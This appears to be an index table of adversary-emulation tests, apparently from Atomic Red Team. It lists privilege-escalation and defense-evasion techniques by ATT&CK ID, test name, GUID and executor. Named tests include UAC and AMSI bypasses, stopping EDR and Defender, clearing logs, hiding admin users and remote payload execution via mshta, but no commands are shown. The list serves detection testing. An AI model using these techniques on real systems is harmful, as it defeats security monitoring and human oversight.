197 privilege-escalation T1547.009 Shortcut Modification 1 Shortcut Modification ce4fc678-364f-4282-af16-2fb4c78005ce command_prompt
198 privilege-escalation T1547.009 Shortcut Modification 2 Create shortcut to cmd in startup folders cfdc954d-4bb0-4027-875b-a1893ce406f2 powershell
199 privilege-escalation T1037.005 Startup Items 1 Add file to Local Library StartupItems 134627c3-75db-410e-bff8-7a920075f198 sh
200 privilege-escalation T1548.003 Sudo and Sudo Caching 1 Sudo usage 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e sh
201 privilege-escalation T1548.003 Sudo and Sudo Caching 2 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
202 privilege-escalation T1548.003 Sudo and Sudo Caching 3 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
203 privilege-escalation T1543.002 Systemd Service 1 Create Systemd Service d9e4f24f-aa67-4c6e-bcbf-85622b697a7c bash
204 privilege-escalation T1543.002 Systemd Service 2 Create Systemd Service file, Enable the service , Modify and Reload the service. c35ac4a8-19de-43af-b9f8-755da7e89c89 bash
205 privilege-escalation T1053.006 Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
206 privilege-escalation T1134.001 Token Impersonation/Theft 1 Named pipe client impersonation 90db9e27-8e7c-4c04-b602-a45927884966 powershell
207 privilege-escalation T1134.001 Token Impersonation/Theft 2 `SeDebugPrivilege` token duplication 34f0a430-9d04-4d98-bcb5-1989f14719f0 powershell
208 privilege-escalation T1546.005 Trap 1 Trap a74b2e07-5952-4c03-8b56-56274b076b61 sh
209 privilege-escalation T1546.004 Unix Shell Configuration Modification 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
210 privilege-escalation T1546.004 Unix Shell Configuration Modification 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
211 privilege-escalation T1546.003 Windows Management Instrumentation Event Subscription 1 Persistence via WMI Event Subscription 3c64f177-28e2-49eb-a799-d767b24dd1e0 powershell
212 privilege-escalation T1543.003 Windows Service 1 Modify Fax service to run PowerShell ed366cde-7d12-49df-a833-671904770b9f command_prompt
213 privilege-escalation T1543.003 Windows Service 2 Service Installation CMD 981e2942-e433-44e9-afc1-8c957a1496b6 command_prompt
214 privilege-escalation T1543.003 Windows Service 3 Service Installation PowerShell 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 powershell
215 privilege-escalation T1547.004 Winlogon Helper DLL 1 Winlogon Shell Key Persistence - PowerShell bf9f9d65-ee4d-4c3e-a843-777d04f19c38 powershell
216 privilege-escalation T1547.004 Winlogon Helper DLL 2 Winlogon Userinit Key Persistence - PowerShell fb32c935-ee2e-454b-8fa3-1c46b42e8dfb powershell
217 privilege-escalation T1547.004 Winlogon Helper DLL 3 Winlogon Notify Key Logon Persistence - PowerShell d40da266-e073-4e5a-bb8b-2b385023e5f9 powershell
218 defense-evasion T1055.004 Asynchronous Procedure Call 1 Process Injection via C# 611b39b7-e243-4c81-87a4-7145a90358b1 command_prompt
219 defense-evasion T1197 BITS Jobs 1 Bitsadmin Download (cmd) 3c73d728-75fb-4180-a12f-6712864d7421 command_prompt
220 defense-evasion T1197 BITS Jobs 2 Bitsadmin Download (PowerShell) f63b8bc4-07e5-4112-acba-56f646f3f0bc powershell
221 defense-evasion T1197 BITS Jobs 3 Persist, Download, & Execute 62a06ec5-5754-47d2-bcfc-123d8314c6ae command_prompt
222 defense-evasion T1197 BITS Jobs 4 Bits download using desktopimgdownldr.exe (cmd) afb5e09e-e385-4dee-9a94-6ee60979d114 command_prompt
223 defense-evasion T1027.001 Binary Padding 1 Pad Binary to Change Hash - Linux/macOS dd ffe2346c-abd5-4b45-a713-bf5f1ebd573a sh
224 defense-evasion T1548.002 Bypass User Account Control 1 Bypass UAC using Event Viewer (cmd) 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 command_prompt
225 defense-evasion T1548.002 Bypass User Account Control 2 Bypass UAC using Event Viewer (PowerShell) a6ce9acf-842a-4af6-8f79-539be7608e2b powershell
226 defense-evasion T1548.002 Bypass User Account Control 3 Bypass UAC using Fodhelper 58f641ea-12e3-499a-b684-44dee46bd182 command_prompt
227 defense-evasion T1548.002 Bypass User Account Control 4 Bypass UAC using Fodhelper - PowerShell 3f627297-6c38-4e7d-a278-fc2563eaaeaa powershell
228 defense-evasion T1548.002 Bypass User Account Control 5 Bypass UAC using ComputerDefaults (PowerShell) 3c51abf2-44bf-42d8-9111-dc96ff66750f powershell
229 defense-evasion T1548.002 Bypass User Account Control 6 Bypass UAC by Mocking Trusted Directories f7a35090-6f7f-4f64-bb47-d657bf5b10c1 command_prompt
230 defense-evasion T1548.002 Bypass User Account Control 7 Bypass UAC using sdclt DelegateExecute 3be891eb-4608-4173-87e8-78b494c029b7 powershell
231 defense-evasion T1548.002 Bypass User Account Control 8 Disable UAC using reg.exe 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 command_prompt
232 defense-evasion T1548.002 Bypass User Account Control 9 Bypass UAC using SilentCleanup task 28104f8a-4ff1-4582-bcf6-699dce156608 command_prompt
233 defense-evasion T1218.003 CMSTP 1 CMSTP Executing Remote Scriptlet 34e63321-9683-496b-bbc1-7566bc55e624 command_prompt
234 defense-evasion T1218.003 CMSTP 2 CMSTP Executing UAC Bypass 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0 command_prompt
235 defense-evasion T1574.012 COR_PROFILER 1 User scope COR_PROFILER 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a powershell
236 defense-evasion T1574.012 COR_PROFILER 2 System Scope COR_PROFILER f373b482-48c8-4ce4-85ed-d40c8b3f7310 powershell
237 defense-evasion T1574.012 COR_PROFILER 3 Registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
238 defense-evasion T1070.003 Clear Command History 1 Clear Bash history (rm) a934276e-2be5-4a36-93fd-98adbb5bd4fc sh
239 defense-evasion T1070.003 Clear Command History 2 Clear Bash history (echo) cbf506a5-dd78-43e5-be7e-a46b7c7a0a11 sh
240 defense-evasion T1070.003 Clear Command History 3 Clear Bash history (cat dev/null) b1251c35-dcd3-4ea1-86da-36d27b54f31f sh
241 defense-evasion T1070.003 Clear Command History 4 Clear Bash history (ln dev/null) 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 sh
242 defense-evasion T1070.003 Clear Command History 5 Clear Bash history (truncate) 47966a1d-df4f-4078-af65-db6d9aa20739 sh
243 defense-evasion T1070.003 Clear Command History 6 Clear history of a bunch of shells 7e6721df-5f08-4370-9255-f06d8a77af4c sh
244 defense-evasion T1070.003 Clear Command History 7 Clear and Disable Bash History Logging 784e4011-bd1a-4ecd-a63a-8feb278512e6 sh
245 defense-evasion T1070.003 Clear Command History 8 Use Space Before Command to Avoid Logging to History 53b03a54-4529-4992-852d-a00b4b7215a6 sh
246 defense-evasion T1070.003 Clear Command History 9 Disable Bash History Logging with SSH -T 5f8abd62-f615-43c5-b6be-f780f25790a1 sh
247 defense-evasion T1070.003 Clear Command History 10 Prevent Powershell History Logging 2f898b81-3e97-4abb-bc3f-a95138988370 powershell
248 defense-evasion T1070.003 Clear Command History 11 Clear Powershell History by Deleting History File da75ae8d-26d6-4483-b0fe-700e4df4f037 powershell
249 defense-evasion T1070.002 Clear Linux or Mac System Logs 1 rm -rf 989cc1b1-3642-4260-a809-54f9dd559683 sh
250 defense-evasion T1070.002 Clear Linux or Mac System Logs 2 Overwrite Linux Mail Spool 1602ff76-ed7f-4c94-b550-2f727b4782d4 bash
251 defense-evasion T1070.002 Clear Linux or Mac System Logs 3 Overwrite Linux Log d304b2dc-90b4-4465-a650-16ddd503f7b5 bash
252 defense-evasion T1070.001 Clear Windows Event Logs 1 Clear Logs e6abb60e-26b8-41da-8aae-0c35174b0967 command_prompt
253 defense-evasion T1070.001 Clear Windows Event Logs 2 Delete System Logs Using Clear-EventLog b13e9306-3351-4b4b-a6e8-477358b0b498 powershell
254 defense-evasion T1070.001 Clear Windows Event Logs 3 Clear Event Logs via VBA 1b682d84-f075-4f93-9a89-8a8de19ffd6e powershell
255 defense-evasion T1027.004 Compile After Delivery 1 Compile After Delivery using csc.exe ffcdbd6a-b0e8-487d-927a-09127fe9a206 command_prompt
256 defense-evasion T1027.004 Compile After Delivery 2 Dynamic C# Compile 453614d8-3ba6-4147-acc0-7ec4b3e1faef powershell
257 defense-evasion T1218.001 Compiled HTML File 1 Compiled HTML Help Local Payload 5cb87818-0d7c-4469-b7ef-9224107aebe8 command_prompt
258 defense-evasion T1218.001 Compiled HTML File 2 Compiled HTML Help Remote Payload 0f8af516-9818-4172-922b-42986ef1e81d command_prompt
259 defense-evasion T1218.001 Compiled HTML File 3 Invoke CHM with default Shortcut Command Execution 29d6f0d7-be63-4482-8827-ea77126c1ef7 powershell
260 defense-evasion T1218.001 Compiled HTML File 4 Invoke CHM with InfoTech Storage Protocol Handler b4094750-5fc7-4e8e-af12-b4e36bf5e7f6 powershell
261 defense-evasion T1218.001 Compiled HTML File 5 Invoke CHM Simulate Double click 5decef42-92b8-4a93-9eb2-877ddcb9401a powershell
262 defense-evasion T1218.001 Compiled HTML File 6 Invoke CHM with Script Engine and Help Topic 4f83adda-f5ec-406d-b318-9773c9ca92e5 powershell
263 defense-evasion T1218.001 Compiled HTML File 7 Invoke CHM Shortcut Command with ITS and Help Topic 15756147-7470-4a83-87fb-bb5662526247 powershell
264 defense-evasion T1218.002 Control Panel 1 Control Panel Items 037e9d8a-9e46-4255-8b33-2ae3b545ca6f command_prompt
265 defense-evasion T1574.001 DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
266 defense-evasion T1574.002 DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
267 defense-evasion T1078.001 Default Accounts 1 Enable Guest account with RDP capability and admin priviliges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
268 defense-evasion T1140 Deobfuscate/Decode Files or Information 1 Deobfuscate/Decode Files Or Information dc6fe391-69e6-4506-bd06-ea5eeb4082f8 command_prompt
269 defense-evasion T1140 Deobfuscate/Decode Files or Information 2 Certutil Rename and Decode 71abc534-3c05-4d0c-80f7-cbe93cb2aa94 command_prompt
270 defense-evasion T1610 Deploy Container 1 Deploy container using nsenter container escape 58004e22-022c-4c51-b4a8-2b85ac5c596b sh
271 defense-evasion T1006 Direct Volume Access 1 Read volume boot sector via DOS device path (PowerShell) 88f6327e-51ec-4bbf-b2e8-3fea534eab8b powershell
272 defense-evasion T1562.002 Disable Windows Event Logging 1 Disable Windows IIS HTTP Logging 69435dcf-c66f-4ec0-a8b1-82beb76b34db powershell
273 defense-evasion T1562.002 Disable Windows Event Logging 2 Kill Event Log Service Threads 41ac52ba-5d5e-40c0-b267-573ed90489bd powershell
274 defense-evasion T1562.002 Disable Windows Event Logging 3 Impair Windows Audit Log Policy 5102a3a7-e2d7-4129-9e45-f483f2e0eea8 command_prompt
275 defense-evasion T1562.002 Disable Windows Event Logging 4 Clear Windows Audit Policy Config 913c0e4e-4b37-4b78-ad0b-90e7b25010f6 command_prompt
276 defense-evasion T1562.004 Disable or Modify System Firewall 1 Disable firewall 80f5e701-f7a4-4d06-b140-26c8efd1b6b4 sh
277 defense-evasion T1562.004 Disable or Modify System Firewall 2 Disable Microsoft Defender Firewall 88d05800-a5e4-407e-9b53-ece4174f197f command_prompt
278 defense-evasion T1562.004 Disable or Modify System Firewall 3 Disable Microsoft Defender Firewall via Registry afedc8c4-038c-4d82-b3e5-623a95f8a612 command_prompt
279 defense-evasion T1562.004 Disable or Modify System Firewall 4 Allow SMB and RDP on Microsoft Defender Firewall d9841bf8-f161-4c73-81e9-fd773a5ff8c1 command_prompt
280 defense-evasion T1562.004 Disable or Modify System Firewall 5 Opening ports for proxy - HARDRAIN 15e57006-79dd-46df-9bf9-31bc24fb5a80 command_prompt
281 defense-evasion T1562.004 Disable or Modify System Firewall 6 Open a local port through Windows Firewall to any profile 9636dd6e-7599-40d2-8eee-ac16434f35ed powershell
282 defense-evasion T1562.004 Disable or Modify System Firewall 7 Allow Executable Through Firewall Located in Non-Standard Location 6f5822d2-d38d-4f48-9bfc-916607ff6b8c powershell
283 defense-evasion T1562.001 Disable or Modify Tools 1 Disable syslog 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8 sh
284 defense-evasion T1562.001 Disable or Modify Tools 2 Disable Cb Response ae8943f7-0f8d-44de-962d-fbc2e2f03eb8 sh
285 defense-evasion T1562.001 Disable or Modify Tools 3 Disable SELinux fc225f36-9279-4c39-b3f9-5141ab74f8d8 sh
286 defense-evasion T1562.001 Disable or Modify Tools 4 Stop Crowdstrike Falcon on Linux 828a1278-81cc-4802-96ab-188bf29ca77d sh
287 defense-evasion T1562.001 Disable or Modify Tools 5 Disable Carbon Black Response 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c sh
288 defense-evasion T1562.001 Disable or Modify Tools 6 Disable LittleSnitch 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3 sh
289 defense-evasion T1562.001 Disable or Modify Tools 7 Disable OpenDNS Umbrella 07f43b33-1e15-4e99-be70-bc094157c849 sh
290 defense-evasion T1562.001 Disable or Modify Tools 8 Disable macOS Gatekeeper 2a821573-fb3f-4e71-92c3-daac7432f053 sh
291 defense-evasion T1562.001 Disable or Modify Tools 9 Stop and unload Crowdstrike Falcon on macOS b3e7510c-2d4c-4249-a33f-591a2bc83eef sh
292 defense-evasion T1562.001 Disable or Modify Tools 10 Unload Sysmon Filter Driver 811b3e76-c41b-430c-ac0d-e2380bfaa164 command_prompt
293 defense-evasion T1562.001 Disable or Modify Tools 11 Uninstall Sysmon a316fb2e-5344-470d-91c1-23e15c374edc command_prompt
294 defense-evasion T1562.001 Disable or Modify Tools 12 AMSI Bypass - AMSI InitFailed 695eed40-e949-40e5-b306-b4031e4154bd powershell
295 defense-evasion T1562.001 Disable or Modify Tools 13 AMSI Bypass - Remove AMSI Provider Reg Key 13f09b91-c953-438e-845b-b585e51cac9b powershell
296 defense-evasion T1562.001 Disable or Modify Tools 14 Disable Arbitrary Security Windows Service a1230893-56ac-4c81-b644-2108e982f8f5 command_prompt
297 defense-evasion T1562.001 Disable or Modify Tools 15 Tamper with Windows Defender ATP PowerShell 6b8df440-51ec-4d53-bf83-899591c9b5d7 powershell
298 defense-evasion T1562.001 Disable or Modify Tools 16 Tamper with Windows Defender Command Prompt aa875ed4-8935-47e2-b2c5-6ec00ab220d2 command_prompt
299 defense-evasion T1562.001 Disable or Modify Tools 17 Tamper with Windows Defender Registry 1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45 powershell
300 defense-evasion T1562.001 Disable or Modify Tools 18 Disable Microsoft Office Security Features 6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7 powershell
301 defense-evasion T1562.001 Disable or Modify Tools 19 Remove Windows Defender Definition Files 3d47daaa-2f56-43e0-94cc-caf5d8d52a68 command_prompt
302 defense-evasion T1562.001 Disable or Modify Tools 20 Stop and Remove Arbitrary Security Windows Service ae753dda-0f15-4af6-a168-b9ba16143143 powershell
303 defense-evasion T1562.001 Disable or Modify Tools 21 Uninstall Crowdstrike Falcon on Windows b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297 powershell
304 defense-evasion T1562.001 Disable or Modify Tools 22 Tamper with Windows Defender Evade Scanning -Folder 0b19f4ee-de90-4059-88cb-63c800c683ed powershell
305 defense-evasion T1562.001 Disable or Modify Tools 23 Tamper with Windows Defender Evade Scanning -Extension 315f4be6-2240-4552-b3e1-d1047f5eecea powershell
306 defense-evasion T1562.001 Disable or Modify Tools 24 Tamper with Windows Defender Evade Scanning -Process a123ce6a-3916-45d6-ba9c-7d4081315c27 powershell
307 defense-evasion T1574.006 Dynamic Linker Hijacking 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
308 defense-evasion T1574.006 Dynamic Linker Hijacking 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
309 defense-evasion T1055.001 Dynamic-link Library Injection 1 Process Injection via mavinject.exe 74496461-11a1-4982-b439-4d87a550d254 powershell
310 defense-evasion T1070.004 File Deletion 1 Delete a single file - Linux/macOS 562d737f-2fc6-4b09-8c2a-7f8ff0828480 sh
311 defense-evasion T1070.004 File Deletion 2 Delete an entire folder - Linux/macOS a415f17e-ce8d-4ce2-a8b4-83b674e7017e sh
312 defense-evasion T1070.004 File Deletion 3 Overwrite and delete a file with shred 039b4b10-2900-404b-b67f-4b6d49aa6499 sh
313 defense-evasion T1070.004 File Deletion 4 Delete a single file - Windows cmd 861ea0b4-708a-4d17-848d-186c9c7f17e3 command_prompt
314 defense-evasion T1070.004 File Deletion 5 Delete an entire folder - Windows cmd ded937c4-2add-42f7-9c2c-c742b7a98698 command_prompt
315 defense-evasion T1070.004 File Deletion 6 Delete a single file - Windows PowerShell 9dee89bd-9a98-4c4f-9e2d-4256690b0e72 powershell
316 defense-evasion T1070.004 File Deletion 7 Delete an entire folder - Windows PowerShell edd779e4-a509-4cba-8dfa-a112543dbfb1 powershell
317 defense-evasion T1070.004 File Deletion 8 Delete Filesystem - Linux f3aa95fe-4f10-4485-ad26-abf22a764c52 bash
318 defense-evasion T1070.004 File Deletion 9 Delete Prefetch File 36f96049-0ad7-4a5f-8418-460acaeb92fb powershell
319 defense-evasion T1070.004 File Deletion 10 Delete TeamViewer Log Files 69f50a5f-967c-4327-a5bb-e1a9a9983785 powershell
320 defense-evasion T1553.001 Gatekeeper Bypass 1 Gatekeeper Bypass fb3d46c6-9480-4803-8d7d-ce676e1f1a9b sh
321 defense-evasion T1564.001 Hidden Files and Directories 1 Create a hidden file in a hidden directory 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be sh
322 defense-evasion T1564.001 Hidden Files and Directories 2 Mac Hidden file cddb9098-3b47-4e01-9d3b-6f5f323288a9 sh
323 defense-evasion T1564.001 Hidden Files and Directories 3 Create Windows System File with Attrib f70974c8-c094-4574-b542-2c545af95a32 command_prompt
324 defense-evasion T1564.001 Hidden Files and Directories 4 Create Windows Hidden File with Attrib dadb792e-4358-4d8d-9207-b771faa0daa5 command_prompt
325 defense-evasion T1564.001 Hidden Files and Directories 5 Hidden files 3b7015f2-3144-4205-b799-b05580621379 sh
326 defense-evasion T1564.001 Hidden Files and Directories 6 Hide a Directory b115ecaf-3b24-4ed2-aefe-2fcb9db913d3 sh
327 defense-evasion T1564.001 Hidden Files and Directories 7 Show all hidden files 9a1ec7da-b892-449f-ad68-67066d04380c sh
328 defense-evasion T1564.002 Hidden Users 1 Create Hidden User using UniqueID < 500 4238a7f0-a980-4fff-98a2-dfc0a363d507 sh
329 defense-evasion T1564.002 Hidden Users 2 Create Hidden User using IsHidden option de87ed7b-52c3-43fd-9554-730f695e7f31 sh
330 defense-evasion T1564.003 Hidden Window 1 Hidden Window f151ee37-9e2b-47e6-80e4-550b9f999b7a powershell
331 defense-evasion T1564 Hide Artifacts 1 Extract binary files via VBA 6afe288a-8a8b-4d33-a629-8d03ba9dad3a powershell
332 defense-evasion T1564 Hide Artifacts 2 Create a Hidden User Called "$" 2ec63cc2-4975-41a6-bf09-dffdfb610778 command_prompt
333 defense-evasion T1564 Hide Artifacts 3 Create an "Administrator " user (with a space on the end) 5bb20389-39a5-4e99-9264-aeb92a55a85c powershell
334 defense-evasion T1562.003 Impair Command History Logging 1 Disable history collection 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 sh
335 defense-evasion T1562.003 Impair Command History Logging 2 Mac HISTCONTROL 468566d5-83e5-40c1-b338-511e1659628d manual
336 defense-evasion T1562.006 Indicator Blocking 1 Auditing Configuration Changes on Linux Host 212cfbcf-4770-4980-bc21-303e37abd0e3 bash
337 defense-evasion T1562.006 Indicator Blocking 2 Logging Configuration Changes on Linux Host 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c bash
338 defense-evasion T1070 Indicator Removal on Host 1 Indicator Removal using FSUtil b4115c7a-0e92-47f0-a61e-17e7218b2435 command_prompt
339 defense-evasion T1202 Indirect Command Execution 1 Indirect Command Execution - pcalua.exe cecfea7a-5f03-4cdd-8bc8-6f7c22862440 command_prompt
340 defense-evasion T1202 Indirect Command Execution 2 Indirect Command Execution - forfiles.exe 8b34a448-40d9-4fc3-a8c8-4bb286faf7dc command_prompt
341 defense-evasion T1202 Indirect Command Execution 3 Indirect Command Execution - conhost.exe cf3391e0-b482-4b02-87fc-ca8362269b29 command_prompt
342 defense-evasion T1553.004 Install Root Certificate 1 Install root CA on CentOS/RHEL 9c096ec4-fd42-419d-a762-d64cc950627e sh
343 defense-evasion T1553.004 Install Root Certificate 2 Install root CA on Debian/Ubuntu 53bcf8a0-1549-4b85-b919-010c56d724ff sh
344 defense-evasion T1553.004 Install Root Certificate 3 Install root CA on macOS cc4a0b8c-426f-40ff-9426-4e10e5bf4c49 sh
345 defense-evasion T1553.004 Install Root Certificate 4 Install root CA on Windows 76f49d86-5eb1-461a-a032-a480f86652f1 powershell
346 defense-evasion T1553.004 Install Root Certificate 5 Install root CA on Windows with certutil 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f powershell
347 defense-evasion T1218.004 InstallUtil 1 CheckIfInstallable method call ffd9c807-d402-47d2-879d-f915cf2a3a94 powershell
348 defense-evasion T1218.004 InstallUtil 2 InstallHelper method call d43a5bde-ae28-4c55-a850-3f4c80573503 powershell
349 defense-evasion T1218.004 InstallUtil 3 InstallUtil class constructor method call 9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93 powershell
350 defense-evasion T1218.004 InstallUtil 4 InstallUtil Install method call 9f9968a6-601a-46ca-b7b7-6d4fe0f98f0b powershell
351 defense-evasion T1218.004 InstallUtil 5 InstallUtil Uninstall method call - /U variant 34428cfa-8e38-41e5-aff4-9e1f8f3a7b4b powershell
352 defense-evasion T1218.004 InstallUtil 6 InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant 06d9deba-f732-48a8-af8e-bdd6e4d98c1d powershell
353 defense-evasion T1218.004 InstallUtil 7 InstallUtil HelpText method call 5a683850-1145-4326-a0e5-e91ced3c6022 powershell
354 defense-evasion T1218.004 InstallUtil 8 InstallUtil evasive invocation 559e6d06-bb42-4307-bff7-3b95a8254bad powershell
355 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 1 chmod - Change file or folder mode (numeric mode) 34ca1464-de9d-40c6-8c77-690adf36a135 bash
356 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 2 chmod - Change file or folder mode (symbolic mode) fc9d6695-d022-4a80-91b1-381f5c35aff3 bash
357 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 3 chmod - Change file or folder mode (numeric mode) recursively ea79f937-4a4d-4348-ace6-9916aec453a4 bash
358 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 4 chmod - Change file or folder mode (symbolic mode) recursively 0451125c-b5f6-488f-993b-5a32b09f7d8f bash
359 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 5 chown - Change file or folder ownership and group d169e71b-85f9-44ec-8343-27093ff3dfc0 bash
360 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 6 chown - Change file or folder ownership and group recursively b78598be-ff39-448f-a463-adbf2a5b7848 bash
361 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 7 chown - Change file or folder mode ownership only 967ba79d-f184-4e0e-8d09-6362b3162e99 bash
362 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 8 chown - Change file or folder ownership recursively 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 bash
363 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 9 chattr - Remove immutable file attribute e7469fe2-ad41-4382-8965-99b94dd3c13f sh
364 defense-evasion T1078.003 Local Accounts 1 Create local account with admin priviliges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
365 defense-evasion T1127.001 MSBuild 1 MSBuild Bypass Using Inline Tasks (C#) 58742c0f-cb01-44cd-a60b-fb26e8871c93 command_prompt
366 defense-evasion T1127.001 MSBuild 2 MSBuild Bypass Using Inline Tasks (VB) ab042179-c0c5-402f-9bc8-42741f5ce359 command_prompt
367 defense-evasion T1553.005 Mark-of-the-Web Bypass 1 Mount ISO image 002cca30-4778-4891-878a-aaffcfa502fa powershell
368 defense-evasion T1553.005 Mark-of-the-Web Bypass 2 Mount an ISO image and run executable from the ISO 42f22b00-0242-4afc-a61b-0da05041f9cc powershell
369 defense-evasion T1036.004 Masquerade Task or Service 1 Creating W32Time similar named service using schtasks f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9 command_prompt
370 defense-evasion T1036.004 Masquerade Task or Service 2 Creating W32Time similar named service using sc b721c6ef-472c-4263-a0d9-37f1f4ecff66 command_prompt
371 defense-evasion T1036 Masquerading 1 System File Copied to Unusual Location 51005ac7-52e2-45e0-bdab-d17c6d4916cd command_prompt
372 defense-evasion T1036.005 Match Legitimate Name or Location 1 Execute a process from a directory masquerading as the current parent directory. 812c3ab8-94b0-4698-a9bf-9420af23ce24 sh
373 defense-evasion T1112 Modify Registry 1 Modify Registry of Current User Profile - cmd 1324796b-d0f6-455a-b4ae-21ffee6aa6b9 command_prompt
374 defense-evasion T1112 Modify Registry 2 Modify Registry of Local Machine - cmd 282f929a-6bc5-42b8-bd93-960c3ba35afe command_prompt
375 defense-evasion T1112 Modify Registry 3 Modify registry to store logon credentials c0413fb5-33e2-40b7-9b6f-60b29f4a7a18 command_prompt
376 defense-evasion T1112 Modify Registry 4 Add domain to Trusted sites Zone cf447677-5a4e-4937-a82c-e47d254afd57 powershell
377 defense-evasion T1112 Modify Registry 5 Javascript in registry 15f44ea9-4571-4837-be9e-802431a7bfae powershell
378 defense-evasion T1112 Modify Registry 6 Change Powershell Execution Policy to Bypass f3a6cceb-06c9-48e5-8df8-8867a6814245 powershell
379 defense-evasion T1218.005 Mshta 1 Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject 1483fab9-4f52-4217-a9ce-daa9d7747cae command_prompt
380 defense-evasion T1218.005 Mshta 2 Mshta executes VBScript to execute malicious command 906865c3-e05f-4acc-85c4-fbc185455095 command_prompt
381 defense-evasion T1218.005 Mshta 3 Mshta Executes Remote HTML Application (HTA) c4b97eeb-5249-4455-a607-59f95485cb45 powershell
382 defense-evasion T1218.005 Mshta 4 Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement 007e5672-2088-4853-a562-7490ddc19447 powershell
383 defense-evasion T1218.005 Mshta 5 Invoke HTML Application - Jscript Engine Simulating Double Click 58a193ec-131b-404e-b1ca-b35cf0b18c33 powershell
384 defense-evasion T1218.005 Mshta 6 Invoke HTML Application - Direct download from URI 39ceed55-f653-48ac-bd19-aceceaf525db powershell
385 defense-evasion T1218.005 Mshta 7 Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler e7e3a525-7612-4d68-a5d3-c4649181b8af powershell
386 defense-evasion T1218.005 Mshta 8 Invoke HTML Application - JScript Engine with Inline Protocol Handler d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840 powershell
387 defense-evasion T1218.005 Mshta 9 Invoke HTML Application - Simulate Lateral Movement over UNC Path b8a8bdb2-7eae-490d-8251-d5e0295b2362 powershell
388 defense-evasion T1218.007 Msiexec 1 Msiexec.exe - Execute Local MSI file 0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8 command_prompt
389 defense-evasion T1218.007 Msiexec 2 Msiexec.exe - Execute Remote MSI file bde7d2fe-d049-458d-a362-abda32a7e649 command_prompt
390 defense-evasion T1218.007 Msiexec 3 Msiexec.exe - Execute Arbitrary DLL 66f64bd5-7c35-4c24-953a-04ca30a0a0ec command_prompt
391 defense-evasion T1564.004 NTFS File Attributes 1 Alternate Data Streams (ADS) 8822c3b0-d9f9-4daf-a043-49f4602364f4 command_prompt
392 defense-evasion T1564.004 NTFS File Attributes 2 Store file in Alternate Data Stream (ADS) 2ab75061-f5d5-4c1a-b666-ba2a50df5b02 powershell
393 defense-evasion T1564.004 NTFS File Attributes 3 Create ADS command prompt 17e7637a-ddaf-4a82-8622-377e20de8fdb command_prompt
394 defense-evasion T1564.004 NTFS File Attributes 4 Create ADS PowerShell 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1 powershell
395 defense-evasion T1070.005 Network Share Connection Removal 1 Add Network Share 14c38f32-6509-46d8-ab43-d53e32d2b131 command_prompt
396 defense-evasion T1070.005 Network Share Connection Removal 2 Remove Network Share 09210ad5-1ef2-4077-9ad3-7351e13e9222 command_prompt
397 defense-evasion T1070.005 Network Share Connection Removal 3 Remove Network Share PowerShell 0512d214-9512-4d22-bde7-f37e058259b3 powershell
398 defense-evasion T1027 Obfuscated Files or Information 1 Decode base64 Data into Script f45df6be-2e1e-4136-a384-8f18ab3826fb sh
399 defense-evasion T1027 Obfuscated Files or Information 2 Execute base64-encoded PowerShell a50d5a97-2531-499e-a1de-5544c74432c6 powershell
400 defense-evasion T1027 Obfuscated Files or Information 3 Execute base64-encoded PowerShell from Windows Registry 450e7218-7915-4be4-8b9b-464a49eafcec powershell
401 defense-evasion T1027 Obfuscated Files or Information 4 Execution from Compressed File f8c8a909-5f29-49ac-9244-413936ce6d1f command_prompt
402 defense-evasion T1027 Obfuscated Files or Information 5 DLP Evasion via Sensitive Data in VBA Macro over email 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad powershell
